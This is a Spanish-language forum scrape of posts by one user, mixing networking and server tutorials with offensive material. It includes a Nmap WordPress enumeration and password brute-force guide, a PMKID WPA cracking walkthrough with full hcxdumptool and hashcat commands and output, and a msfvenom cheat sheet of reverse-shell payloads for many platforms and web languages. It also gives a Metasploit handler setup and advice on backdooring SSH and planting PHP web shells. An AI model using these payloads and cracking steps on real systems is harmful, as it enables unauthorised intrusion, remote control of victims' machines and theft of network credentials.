Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

De tanto ver videos y mucha información veo que todavía no entiendes sobre el modelo OSI.  El modelo OSI no es una configuración y nada por el estilo, Esta es para entender cómo funciona o como trabajan los equipos de telecomunicaciones y más que nada es un estándar, existe una historia sobre esta normativa que no me acuerdo bien. Para que se entienda esta es una forma de ver como los datos viajan atreves de unos dispositivos atreves de estos sietes capas.

Como por ejemplo existen switch capa 2 y switch capa 3. La diferencia principal entre la Capa 2 y la Capa 3 radica en la función de enrutamiento. Un Switch Capa 2 funciona sólo con direcciones MAC y no considera la dirección IP ni ningún elemento de capas superiores. Un switch de Capa 3 hace las funciones de un Switch Capa 2. Además, Switch Capa 3 puede ejecutar enrutamiento estático y enrutamiento dinámico. En otras palabras, un switch de Capa 3 dispone de una tabla de direcciones MAC y de una tabla de enrutamiento IP.


Sobre tu pregunta:

Donde se configura esto (en un dispositivo?, En un ruter/otro parecido?), Cuando debo usar uno u otro y la comunicación de los aparatos informáticos funcionaria de igual manera si yo me comunicó usando un modelo TCP/IP y el receptor un OSI?

1. Modelo OSI no se configura. Es un estandar teorico.
2. Esto se ocupa para entender los protocolos y como funciona una red el uso de los datos.
3. TCP/IP Son protocolo de trasmision y de internet.  Y el modelo OSI es estar teorico no es no existe coneccion sobre el.


Saludos.

Navegando por el internet me encontré con esto. Lo encontré interesante.

Nmap es una herramientas cuando se trata de pruebas de seguridad (excepto en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login). Nmap fue creado en 1997 por Gordon Lyon alias Fyodor. La versión actual 7.60 contiene aproximadamente 580 scripts NSE diferentes (Nmap Scripting Engine) utilizados para diferentes comprobaciones de seguridad o recopilación de información y aproximadamente seis de ellos están relacionados con WordPress.

Nuestra primera prueba es usar las opciones predeterminadas en nmap y ver qué puertos están abiertos:



Por cierto, estamos usando la asombrosa penetración de pruebas de la distribución Kali Linux. La captura de pantalla anterior muestra que hay un servidor web, un servidor ssh y MySQL escuchando en la red. Exponer MySQL a la red no es realmente seguro, no es el objetivo esta vez.

Los siguientes scripts de Nmap NSE están directamente relacionados con WordPress:

• http-wordpress-users.nse
• http-wordpress-enum.nse
• http-wordpress-brute.nse
• http-vuln-cve2017-1001000.nse
• http-vuln-cve2014-8877.nse

Cuando ejecutamos nuestra segunda prueba, nos centramos en el servidor web y utilizamos el argumento -A para Nmap para habilitar el escaneo de scripts:



De la captura de pantalla anterior notamos que la secuencia de comandos http-generator muestra la versión de WordPress, y en este caso 4.8.2.

Ahora es el momento para el trabajo pesado: ejecutar los scripts de WordPress. Podemos empezar añadiendo el

--script

argumento como el de abajo. Sea como sea, esto puede tomar algún tiempo para terminar, en nuestro caso de prueba nos llevó aproximadamente 12 minutos:



¡Ahora estamos hablando! Esto se ve bien, vamos a interpretar los resultados identificados Nmap. Tres temas diferentes y nueve plugins diferentes con las versiones correspondientes. También podemos leer que solo se buscan los 100 mejores temas / complementos en el complemento http-wordpress-enum.

Este tipo de escaneo de fuerza bruta es muy ruidoso y los archivos de registro del servidor web de destino se parecen a esto:



Podemos ajustar los tiempos con el argumento -T5 para ejecutar un escaneo más lento. Y para cambiar el User-Agent para que el hecho de informarle a nuestro host escaneado que estamos ejecutando Nmap se pueda cambiar así:

--script-args http.useragent="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"

Además, podemos cambiar el número de complementos o temas para verificar usando los siguientes argumentos:

--script-args search-limit=5000

También también podemos ajustar para enumerar sólo para temas:

--script-args type="themes"

En nuestra instalación de Nmap con Kali Linux, Nmap puede verificar 4778 temas y 50553 complementos:

$ wc -l /usr/share/nmap/nselib/data/wp-themes.lst
4778 /usr/share/nmap/nselib/data/wp-themes.lst

$ wc -l /usr/share/nmap/nselib/data/wp-plugins.lst
50553 /usr/share/nmap/nselib/data/wp-plugins.lst

Finalmente me gustaría dirigirme al bruteforcer de inicio de sesión. En la captura de pantalla anterior, podemos ver que el script NSE http-wordpress-brute.nse descubrió que el administrador de inicio de sesión tiene la contraseña de administrador.

El bruteforcer también tiene algunos argumentos para usar:

--script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' <target>

Como puede ver, los argumentos son bastante autoexplicativos, puede establecer subprocesos, lista de usuarios para usar y base de datos de contraseñas.

Si está buscando una contraseña grande o una lista de usuarios, recomendaría SecLists en Github:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

FUENTE: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

tú dices si se puede o es posible tener una conexión a un PC apagado conectado la red? Si es lo que intentas decir es imposible. Como va a ver conexión si no existe proceso porque no hay corriente. es algo ilógico.

En este pequeño proyecto vamos a ocupar la raspberry pi 3 b y lo vamos a conectar a un módulo de 4 relé y lo estaremos controlando a través de una página web apache de forma local. Los códigos estaré en GitHub lo cual los códigos estarán comentando y esto en raspbian.

---

Que nececitamos

- Raspberry pi 3
- Módulo de relé de 4 matrices
- 6 jumper hembra o más conocido como cable gpio
- Wifi
- SSH

---

Raspbian

Dejo un video para saber cómo se instala raspbian a la raspberry

---

El Armado

Primero vamos a ver que GPIO vamos a ocupar. Si no saben que es el GPIO pueden ver la imagen para saber a qué nos referimos.



Entonces estaríamos ocupando los siguientes números de pines.

4 - 5v
6 - GND "Tierra"
8 - GPIO 14
10 - GPIO 15
11 - GPIO 17
12 - GPIO 18

Explicare los pines del relé



Como vieron la imagen el relé tiene 6 pines lo cual que vamos a conectar a la raspberry

VCC - Es al que vamos a conectar a los 5v
GND - Tierra
IN4 - Este pin controla el relé 4
IN3 - Este pin controla el relé 3
IN2 - Este pin controla el relé 2
IN1 - Este pin controla el relé 1

Ahora tenemos que conectarlos le voy a dejar una tabla para identificar como voy a conectar los pines

--------------------------
Raspberry | RELE
--------------------------
    PIN 4     | VCC   
--------------------------
    PIN 6     | GND
--------------------------
    PIN 8     | IN4
--------------------------
    PIN 10   | IN3
--------------------------
    PIN 11   | IN2
--------------------------
    PIN 12   | IN1
--------------------------

o más bien en esta imagen

---

Testeo

ante de testeo actualizaremos nuestra raspbian

apt-get update && apt-get upgrade

Ahora vamos a testear si esta todo conectado con este código, que está en python.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

en la consola escribimos sudo nano You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y pegamos el código y para ejecutarlo escribimos sudo python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Entonces lo que hace esto es un conteo de apagado y encendido un barrido.

---

Version WEB

Ahora vamos a controlar el relé en una página WEB

Primero tenemos que instalar apache y php

sudo apt-get install apache2 -y

sudo apt-get install php7.0 libapache2-mod-php7.0 -y

Ante de iniciar el servicio apache tenemos que otorgar permisos. Los directorios, utilizados por un servidor web en linux se sitúan en /var/www, y el usuario típico para dicho entorno suele ser www-data. Ahora vamos a crear el grupo y usuario estándar para nuestro servidor, a la par que otorgamos los permisos pertinentes y añadimos a nuestro usuario por defecto (pi) al grupo comentado. De esta forma no será preciso que el usuario root (su) sea siempre el que pueda operar en /var/www.

Comenzamos cambiando el usuario y el grupo al directorio:

sudo chown www-data:www-data /var/www/

Damos los permisos a la carpeta www/:

sudo chmod 775 /var/www/

Agregamos el usuario pi al grupo www-data:

sudo usermod -a -G www-data pi

y reiniciamos el servicio apache sudo service apache2 restart

El codigo php y python esta en github: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

cd /var/www/html
git clone You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

y no vamos nuestra página local y probamos con pagar y encender los relés y si funciona y todo está todo bien lo vamos a conectar a una lampara.

Cada relé tiene 3 salida y nosotros vamos a ocuparlo solamente 2 primeros el tercero se ocupa cuando se hace una conexión con un interruptor mecánico en caso cuando no tenemos un PC o un celular a mano.



en mi caso quedara algo a si.. ojo para hacer esta conexión procuren que la lampara no esté conectado a la corriente es totalmente peligroso



da lo mismo cuál de los 2 cable deben ocupar le dejo un diagrama para que lo entiendan mejor



lo enchufan a la corriente y listo

---

Mas que nada es cuestion de gusto si a la final las herramientas o servicios se instalan...

Saludos.

Puede ser el tipico que todo recomiendan en todos lados  TL-WN727N. igual esta  AWUS036NH y Tl-wn7200nd

Saludos

puede ser que la maquina victima no ejecute el paylodad. el AV puede borrar o por ultima instancia ve el corta fuego

Si o si tienes que codear. ve esto You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y ese exploit esta listo para usarse sin metasploit.

y que ip pusiste en el router? y te fijaste que ese puerto esta libre? por que puedes a ver un servicio que esta corriendo en ese puerto

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ese exploit no es de metasploit. Mira no por que diga que es un exploit no va a significar que tenga una relación directa a metasploit. metasploit en si trabaja con ruby.


a si que para usar ese exploit primero tienes que guardarlo en un editor de texto con la extencion .py para poder ejecutarlo.

Saludos

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Super facil liberar el puerto del router.

Saludos.

En este escrito, describiré una nueva técnica para descifrar contraseñas WPA PSK "Clave precompartida" (Pre-Shared Key).

Para hacer uso de este nuevo ataque necesita las siguientes herramientas:

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Este ataque fue descubierto accidentalmente mientras buscaba nuevas formas de atacar el nuevo estándar de seguridad WPA3. WPA3 será mucho más difícil de atacar debido a su moderno protocolo de establecimiento de claves denominado "Simultaneous Authentication of Equals" (SAE).

La principal diferencia con los ataques existentes es que en este ataque, no se requiere la captura de un EAPOL completo de 4 vías. El nuevo ataque se realiza en RSN IE (Elemento de información de red de seguridad robusta) de un único marco EAPOL.

En este momento, no sabemos para qué proveedores o cuántos enrutadores funcionará esta técnica, pero creemos que funcionará contra todas las redes 802.11i/p/q/r con funciones de itinerancia habilitadas (la mayoría de los enrutadores modernos).

Las principales ventajas de este ataque son las siguientes:

• No se requieren más usuarios regulares, porque el atacante se comunica directamente con el AP (también conocido como ataque "sin cliente")
• No más esperando un handshake completo de 4 vías entre el usuario regular y el AP
• No más retransmisiones eventuales por EAPOL frames (lo que puede llevar a resultados imposibles de descifrar)
• No más contraseñas eventuales no válidas enviadas por el usuario habitual
• No más perdidas de EAPOL frames cuando el usuario regular o el AP está demasiado lejos del atacante
• No se requiere fixing y replaycounter (lo que resulta en velocidades ligeramente más altas)
• o más formato de salida especial (pcap, hccapx, etc.) - los datos finales aparecerán como una cadena codificada hexagonal regular

---

Detalles de ataque:

El RSN IE es un opcional campo que se puede encontrar en  802.11 Trama de gestión. Una de las capacidades de RSN es el PMKID.



El PMKID se calcula utilizando HMAC-SHA1 donde la clave es PMK y la parte de datos es la concatenación de una etiqueta de cadena fija "PMK Name", la dirección MAC del punto de acceso y la dirección MAC de la estación.

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Como el PMK es el mismo que en un handshake EAPOL regular de 4 vías, este es un vector de ataque ideal.

Recibimos todos los datos que necesitamos en el primer marco de EAPOL del AP.

---

Mano a la obra:

1. Ejecute hcxdumptool para solicitar el PMKID desde el AP y para dump el frame recibido en un archivo (en formato pcapng).

./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

Salida

start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

Si un AP recibe nuestro paquete de solicitud de asociación y admite el envío de PMKID, veremos un mensaje "FOUND PMKID" después de un momento:

[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e <ESSID> [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

Nota: En función del ruido en el canal wifi, puede llevar un tiempo recibir el PMKID. Recomendamos ejecutar hcxdumptool hasta 10 minutos antes de abortar.


2. Ejecute hcxpcaptool para convertir los datos capturados del formato pcapng a un formato hash aceptado por hashcat.

./hcxpcaptool -z test.16800 test.pcapng

Salida

start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 1

1 PMKID(s) written to test.16800

El contenido del archivo escrito se verá así:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

Las columnas son las siguientes (todas codificadas con hexadecimal):

• PMKID
• MAC AP
• MAC Station
• ESSID

Nota: Aunque no es obligatorio, se recomienda utilizar las opciones -E -I y -U con hcxpcaptool. Podemos usar estos archivos para alimentar hashcat. Por lo general, producen buenos resultados.

• -E recupera posibles contraseñas del tráfico WiFi (adicional, esta lista incluirá ESSID)
  
• -I Recobro identidades del tráfico WiFi
  
• -U Recupe los nombres de usuario del tráfico WiFi
  

./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

3. Ejecute hashcat para descifrarlo.

Básicamente podemos atacar este hash como cualquier otro tipo de hash. El modo hash que debemos usar es 16800.

/hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Salida

hashcat (v4.2.0) starting...

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated...: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....:  1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

También hay soporte para hash-mode 16801, que permite omitir el cálculo de PMK, que es el cálculo que hace que craquear WPA sea tan lento. Precomputar PMK puede ser útil en casos en los que se encuentre en el sitio y no pueda transferir un hash a una plataforma de craqueo remoto debido a una NDA. El objetivo es ejecutar hashcat en su computadora portátil que puede llevar al sitio.

El modo 16801 espera una lista de PMK precalculados, como cadenas codificadas hexadecimales de longitud 64, como la lista de palabras de entrada. Para precalcular los PMK, puede usar la herramienta hcxkeys. Las herramientas hcxkeys requieren el ESSID, por lo que debe solicitar el ESSID de su cliente con anticipación.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola.

Yo ocupo nmap o Zenmap o fing que lo ocupo con el celular o con windows.

Project Neto es un paquete de Python 3 concebido para analizar y desentrañar las características ocultas de los complementos y extensiones de navegadores conocidos como Firefox y Chrome. Automatiza el proceso de descomprimir los archivos empaquetados para extraer estas características de recursos relevantes en una extensión como manifest.json, carpetas de localización o archivos fuente de JavaScript y HTML.

---

Instalación

instalar el paquete, el usuario puede elegir pip3.

pip3 install -e . --user

Opcionalmente, también se puede instalar con privilegios de administrador usando sudo:

sudo pip3 install -e .

Una instalación exitosa se puede verificar usando:

python3 -c "import neto; print(neto.__version__)"

---

Inicio rápido

Para realizar el análisis de una extensión, el analista puede escribir lo siguiente:

neto analysis -u https://yoururl.com/extension-name.xpi

La extensión se descargará automáticamente y se descomprimirá de forma predeterminada en la carpeta temporal del sistema.

Sin embargo, el analista también puede lanzar un análisis hacia una extensión almacenada localmente:

neto analysis -e ./my-extension-name.xpi

Después de realizar el análisis estático, generará un archivo Json que se almacena de manera predeterminada en una carpeta recién creada llamada output.

Si usa Python, también puede importar el paquete como una biblioteca en sus propios módulos de Python:

>>> from neto.lib.extensions import Extension
>>> my_extension = Extension ("./sample.xpi")
>>> my_extension.filename
'adblock_for_firefox-3.8.0-an+fx.xpi'
>>> my_extension.digest
'849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'

Además de acceder a los elementos que se encuentran en la extensión que usa propiedades, el analista siempre puede tener acceso a ella como un diccionario:

>>> my_extension.__dict__
{'_analyser_version': '0.0.1', '_digest': '849ec142a8203da194a73e773bda287fe0e830e4ea59b501002ee05121b85a2b'…

Si no está usando Python, puede usar el daemon JSON RPC:

$ neto daemon

         ____            _           _      _   _      _
        |  _ \ _ __ ___ (_) ___  ___| |_   | \ | | ___| |_ ___
        | |_) | '__/ _ \| |/ _ \/ __| __|  |  \| |/ _ \ __/ _ \ 
        |  __/| | | (_) | |  __/ (__| |_   | |\  |  __/ || (_) |
        |_|   |_|  \___// |\___|\___|\__|  |_| \_|\___|\__\___/
                      |__/

                                    Developed by @ElevenPaths
                                    Version: 0.5.0b


 * Running on http://localhost:14041/ (Press CTRL+C to quit)

A continuación, puede ejecutar comandos utilizando su biblioteca JSON RPC preferida para escribir un cliente (hemos escrito una breve demostración en la carpeta bin) o incluso curl:

 curl --data-binary '{"id":0, "method":"remote", "params":["https://example.com/myextension.xpi"], "jsonrpc": "2.0"}'  -H 'content-type:text/json;' http://localhost:14041

---

Caracteristicas

La siguiente es una lista no exhaustiva de las características incluidas en este paquete son las siguientes:

• Análisis manifiesto
• Hash de archivo interno.
• Extracción de entidades con expresiones regulares: direcciones IPv4, correo electrónico, criptomonedas, URL, etc.
• Extracción de comentarios de HTML, CSS y archivos JS.
• Motor de detección de cryptojacking basado en dominios y expresiones de minería conocidas.
  
• Detección de código Javascript sospechoso como eval ().
  
• Análisis de certificado si se proporciona.
  
• Análisis por lotes de extensiones previamente descargadas.
  

---

Descargar Neto

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hola. Mira tengo un tutorial que explico de como configurar el ftp.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Si soporta.

Saludos.

wikipedia: Protocolo de transferencia de archivos (en inglés File Transfer Protocol o FTP). Es un protocolo de red para la transferencia de archivos entre sistemas conectados a una red TCP, basado en la arquitectura cliente-servidor. Desde un equipo cliente se puede conectar a un servidor para descargar archivos desde él o para enviarle archivos, independientemente del sistema operativo utilizado en cada equipo.

Servidor FTP: Un servidor FTP es un programa especial que se ejecuta en un equipo servidor normalmente conectado a Internet (aunque puede estar conectado a otros tipos de redes, LAN, MAN, etc.). Su función es permitir el intercambio de datos entre diferentes servidores/ordenadores.

vsftpd: o daemon FTP muy seguro, es un servidor FTP para sistemas tipo Unix, incluido Linux. Está licenciado bajo la Licencia Pública General de GNU. Es compatible con IPv6 y SSL.

---

Voy a explicar cómo instalar y configurar un servidor FTP en una máquina Debian.

Primero tenemos que instalar el paquete vsftpd y para eso escribimos en la consola lo siguiente:

apt-get install vsftpd

Lo segundo es configurar el vsftpd que está en /etc/vsftpd.conf y descomentamos las opciones siguientes quitado el gato "#"

nano /etc/vsftpd.conf

Entonces buscaremos las siguiente opciones.

write_enable=YES  || En esta sirve para que los usuarios tenga permiso de escritura en otras palabras pueda subir archivos.

chroot_local_users=YES || Que los usuarios estén enjaulados en su directorio "carpeta" FTP - /home

chroot_list_enable=YES || Que los usuarios estén enjaulados en su directorio "carpeta" FTP - /home

chroot_list_file=/etc/vsftpd.chroot_list  || Opción para enjaular a los usuarios en su carpeta /home y para esto tenemos que agregar una opcion para mas allow_writeable_chroot=YES para dar el permiso de escritura.

En la opción chroot_list_file=/etc/vsftpd.chroot_list nos indica una ruta"/etc/vsftpd.chroot_list" de un archivo que no esta creada entonces como tercer paso es crear el archivo

nano /etc/vsftpd.chroot_list

en este archivo tenemos que colocar en cada linea los usuario que NO queremos que sean enjaulados. Osea si escribimos un usuario ejemplo admin entonces cuando el usuario admin se conecte por ftp al servidor tenga el permiso de ver todas la carpeta del servidor y no solo del usuario en si, que seria enjaulado.

y cuando terminemos de configurar tenemos que resetear el servicio vsftpd y para eso en la consola escribimos:

service vsftpd restart

Para parar el servicio

service vsftpd stop

Para activar el servicio

service vsftpd start

Para ver el estado del servicio

service vsftpd status

---

Y lo ultimo como crear usuarios para el servicio FTP.

useradd usuario1

dejar en claro que el "usuario1" lo puse a modo ejemplo usted puede colocar cualquier nombre a su gusto, claro si usted esta trabajando y su usuario se llama juanito perez colocan useradd jperez como ejemplo.

A este usuario le damos una contraseña.

passwd 1234

el 1234 es la contraseña

vamos a crear su carpeta en home.

mkdir /home/usuario1

Ahora asignaremos el usuario a la carperta que creamos en home.

usermod -d home/usuario1 usuario1

y ahora tenemos que asignar el usuario al grupo de FTP.

usermod -g ftp usuario1

Tenemos que cambiar el propietario del directorio del usuario que creamos.

chown usuario1/home/usuario1

y cambiar el grupo a FTP

chgrp ftp /home/usuario1

El problema de acá es que estamos creando usuario para el sistema y nuestra idea es crear usuario para que solo se ocupen el servicio FTP y nada mas para eso lo que tenemos que hacer es:

usermod -s /bind/ftp usuario1

entonces el usuario usuario1 no se va a conectar al servidor por que no es usuario de sistema solo es usuario del servicio FTP.

Y eso seria todos Saludos 

---

Ahora vamos a crear un simple paylodad con msfvenom con extensión .exe

---

MSFVENOM: Es un generador de paylodad independiente de metasploit. Esta herramienta es una combinación de msfpayload y msfencode utilizar ambas herramientas en una única instancia. Msfvenom reemplazo tanto msfpayload como msfencode a partir del 8 de junio del 2015.

---

Se han preguntado que es reverse y que es bind.

Reverse shell: O shell inverso en español es un tipo de shell en que el equipo víctima se comunica de vuelta con la maquina atacante. La máquina atacante tiene un puerto de escucha en el que recibe la conexión.

bind shell: Tipo de shell en el que la máquina de destino abre un puerto de comunicación o un oyente en la máquina víctima y espera una conexión entrante. Luego, el atacante se conecta al oyente de la máquina víctima, que luego lleva a la ejecución de código o comando en el servidor.

---

CUANDO USAR UNA REVERSE SHELL??

Si te encuentras en uno de los siguientes escenarios no limitado, entonces deberías considerar usar un shell inverso

• la máquina de la víctima esta detrás de una red privada diferente.
• El firewall de la máquina objetivo bloquea los intentos de conexión entrante a su bindshell.
• tu payload no puede unirse al puerto que deseas debido a cualquier razón.
• Simplemente no puede decidir que elegir.

Cuando una shell inverso no es necesario

Si puede hacer un backdoor de un servicio existente, es posible que no necesite una shell inverso. Por ejemplo: si la máquina de destino ya está ejecutando un servicio SSH, puede intentar agregarle un nuevo usuario y usarlo.

Si la máquina de destino es un servidor web que admite un lenguaje de programación del lado del servidor, entonces puede dejar una puerta trasera en ese lenguaje. Por ejemplo, muchos servidores Apache soportan PHP, luego puede usar un "shell web" de PHP. Los servidores IIS suelen ser compatibles con ASP o You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. El Metasploit ofrece cargas útiles en todos estos lenguajes.

Lenguajes para crear paylodad necesario


Binarios

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f macho > shell.macho

Web Payloads

PHP

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f asp > shell.asp

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f war > shell.war

Scripting Payloads

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Tu IP> LPORT=<Tu puerto> -f raw > shell.pl

Shellcode

Para todos los shellcode, consulte 'msfvenom -help-formats' para obtener información sobre los parámetros válidos. Msfvenom dará salida al código que se puede cortar y pegar en este lenguaje para sus exploits.

Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f <lenguaje>

Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f <lenguaje>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Tu IP> LPORT=<Tu puerto> -f <lenguaje>

Handlers

use exploit/multi/handler
set PAYLOAD <Nombre del payload que ocupamos al general con el msfvenom>
set LHOST <Nuestra IP>
set LPORT <El puerto que seteamos>
exploit

Mas adelante lo veremos con mas detalles.

---

Como configurar una shell inverso durante la generación de un paylodad, Cuando generamos una shell inverso con msfvenom debemos saber las siguientes opciones importante. LHOST y LPORT.

LHOST - Esta es la dirección IP a la que desea que se conecte nuestra máquina de destino, En otra palabra nuestra dirección IP, recuerden que la víctima se tiene que conectar hacia nosotros.

LPORT - Este es el puerto al que se conectara la máquina de destino. Acá podemos poner cualquier puerto ojo que no se esté ocupando, para saber eso ocupe NMAP lo más común del puerto que se ocupa son como 443, 444, 445 como ejemplo.

Un puerto es un punto final a una conexión lógica y el medio por el que un programa cliente se comunica con un programa específico en una computadora en una red digamos que estas en una habitación lleno de puertas enumerado del 0 al 65536 y que cada puerta tiene un servicio único que como el puerto 80 que es web y si nosotros que LPORT ponemos 80 va a ver conflicto por que el 80 ya está ocupado. existen puertos ya asignado como la siguiente lista:

Puerto   Descripción
1   TCP Port Service Multiplexer (TCPMUX)
5   Remote Job Entry (RJE)
7   Protocolo Echo (Responde con eco a llamadas remotas)
9   Protocolo Discard (Elimina cualquier dato que recibe)
13   Daytime (Fecha y hora actuales)
17   Quote of the Day (Cita del Día)
18   Message Send Protocol (MSP)
19   Protocolo Chargen, Generador de caractéres
20   FTP — Datos
21   FTP — Control
22   SSH, scp, SFTP – Remote Login Protocol
23   Telnet
25   Simple Mail Transfer Protocol (SMTP)
29   MSG ICP
37   Time
42   Host Name Server (Nameserv)
43   WhoIs
49   Login Host Protocol (Login)
53   Domain Name System (DNS)
66   Oracle SQLNet
67   BOOTP (BootStrap Protocol) (Server), también usado por DHCP
68   BOOTP (BootStrap Protocol) (Client), también usado por DHCP
69   Trivial File Transfer Protocol (TFTP)
70   Gopher Services
79   Finger
80   HTTP
